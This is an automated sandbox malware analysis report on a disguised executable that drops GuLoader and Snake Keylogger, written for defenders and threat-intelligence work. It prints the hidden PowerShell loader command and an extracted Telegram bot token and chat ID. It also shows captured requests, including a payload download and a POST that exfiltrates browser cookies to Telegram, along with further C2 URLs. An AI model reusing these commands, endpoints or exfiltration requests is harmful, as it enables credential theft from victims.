Edit tour

Windows Analysis Report
Order requirements CIF Greece_pdf.exe

Overview

General Information

Sample name:	Order requirements CIF Greece_pdf.exe
Analysis ID:	1560036
MD5:	998e394361bd54c58a1ad2092fca8b6c
SHA1:	c68e7856324a50c04ee5e1de46952ecaed47eff7
SHA256:	87f519d29ebc3fb1b6bed4a5e7ac4865b029da69d2608548a8db34e4069673ec
Tags:	exeGuLoaderQuotationuser-cocaman
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Disables CMD prompt

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Order requirements CIF Greece_pdf.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe" MD5: 998E394361BD54C58A1AD2092FCA8B6C)

powershell.exe (PID: 7512 cmdline: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 8044 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84", "Chat_id": "6897585916", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 8044	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 8044	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.186.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8044, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", CommandLine: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", ParentImage: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe, ParentProcessId: 7472, ParentProcessName: Order requirements CIF Greece_pdf.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ", ProcessId: 7512, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T10:37:01.172336+0100	2803305	3	Unknown Traffic	192.168.2.4	49740	188.114.96.3	443	TCP
2024-11-21T10:37:17.561437+0100	2803305	3	Unknown Traffic	192.168.2.4	49782	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T10:36:56.775750+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.247.73	80	TCP
2024-11-21T10:36:59.510233+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.247.73	80	TCP
2024-11-21T10:37:02.650777+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49742	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T10:36:47.259837+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	142.250.186.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84", "Chat_id": "6897585916", "Version": "4.4"}
Source: msiexec.exe.8044.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Order requirements CIF Greece_pdf.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Order requirements CIF Greece_pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EB300 CryptUnprotectData,		6_2_236EB300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_236EBA61 CryptUnprotectData,		6_2_236EBA61

Source: Order requirements CIF Greece_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2

Source: Order requirements CIF Greece_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2047558142.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Code function: 0_2_00406448 FindFirstFileA,FindClose,	0_2_00406448
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040589C
Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EBDF0h	6_2_236EBB20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EAA25h	6_2_236EA6E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EFCBEh	6_2_236EF9F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E5E21h	6_2_236E5B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E89F1h	6_2_236E8748
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E2A01h	6_2_236E2758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E59C9h	6_2_236E5720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EE5EEh	6_2_236EE320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E25A9h	6_2_236E2300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E92A3h	6_2_236E8FF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov esp, ebp	6_2_236EDBF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E6279h	6_2_236E5FD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E8E49h	6_2_236E8BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E2E59h	6_2_236E2BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EEA7Eh	6_2_236EE7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E5119h	6_2_236E4E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E7CE9h	6_2_236E7A40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E1CF9h	6_2_236E1A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EA0E1h	6_2_236E9E38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E4CC1h	6_2_236E4A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E8599h	6_2_236E82F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E5571h	6_2_236E52C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E2151h	6_2_236E1EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E8141h	6_2_236E7E98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EA539h	6_2_236EA290
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EE15Eh	6_2_236EDE90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E4411h	6_2_236E4168
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EF82Eh	6_2_236EF560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E0FF1h	6_2_236E0D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E3FB9h	6_2_236E3D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E7891h	6_2_236E75E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E9C89h	6_2_236E99E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E18A1h	6_2_236E15F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E4869h	6_2_236E45C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E1449h	6_2_236E11A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E9831h	6_2_236E9588
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E7439h	6_2_236E7190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E3709h	6_2_236E3460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E02E9h	6_2_236E0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EEF0Eh	6_2_236EEC40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E32B1h	6_2_236E3008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov esp, ebp	6_2_236EDC08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E0B99h	6_2_236E08F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236EF39Eh	6_2_236EF0D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E3B61h	6_2_236E38B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 236E0741h	6_2_236E0498

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095deHost: api.telegram.orgContent-Length: 7045

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.186.78:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095deHost: api.telegram.orgContent-Length: 7045

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 09:37:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
